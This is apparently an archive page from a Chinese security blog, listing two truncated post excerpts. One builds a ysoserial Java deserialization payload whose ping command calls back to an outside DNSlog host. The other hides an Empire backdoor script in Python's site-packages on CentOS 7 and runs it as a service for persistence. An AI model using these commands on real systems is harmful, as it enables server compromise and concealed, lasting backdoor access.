01 2020 档案
摘要:1.生成测试payload: cd D:\plug_in\BurpSuite JAVA反序列化漏洞扫描插件 //下面的语句意思就是反连到你自已的dnslog平台: java -jar ./ysoserial-0.0.5.jar Groovy1 "ping t00ls.321c7f33a1e05e08
阅读全文
摘要://centos7下面利用服务启动empire后门的方法: vi /usr/lib/python2.7/site-packages/pci.sh //放入empire后门chmod 755 /usr/lib/python2.7/site-packages/pci.shcd /usr/lib/syst
阅读全文

浙公网安备 33010602011771号